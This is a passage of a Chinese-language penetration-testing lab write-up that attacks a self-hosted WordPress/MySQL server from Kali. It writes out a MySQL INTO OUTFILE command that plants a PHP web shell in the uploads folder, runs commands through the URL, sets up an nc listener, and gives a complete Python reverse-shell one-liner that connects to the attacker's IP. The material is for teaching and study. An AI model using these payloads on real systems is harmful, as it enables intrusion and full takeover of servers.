声明:本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。
建议阅读上一篇后再来阅读本文!!!
六、Mysql攻陷服务器
1、mysql INTO OUT文件上传
MySQL中你可以使用SELECT…INTO OUTFILE语句来简单的导出数据到文本文件上。
1)INTO OUT 写入shell.php
mysql -uroot -pplbkac -h 192.168.40.152
select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/https/blogblog/wp-content/uploads/shell.php";
可看到利用INTO OUT特性写入了一句话并导入到本地站目录上!
2)查看是否写入成功
https://192.168.40.152:12380/blogblog/wp-content/uploads/
写入成功!
3)URL执行cmd命令
https://192.168.40.152:12380/blogblog/wp-content/uploads/shell.php?cmd=id
可看到一句话成功写入,利用一句话特性执行了命令获得服务器信息回显!
2、一句话触发反弹shell
1)查看是否可以用Python写入一句话
https://192.168.40.152:12380/blogblog/wp-content/uploads/shell.php?cmd=which%20python
存在python模块!直接利用!
2)开启nc监听
nc -lvp 8887
本地kali开启好监听!
3)在cmd URL写入Python一句话,反弹shell到本地kali
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.40.149",8887));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'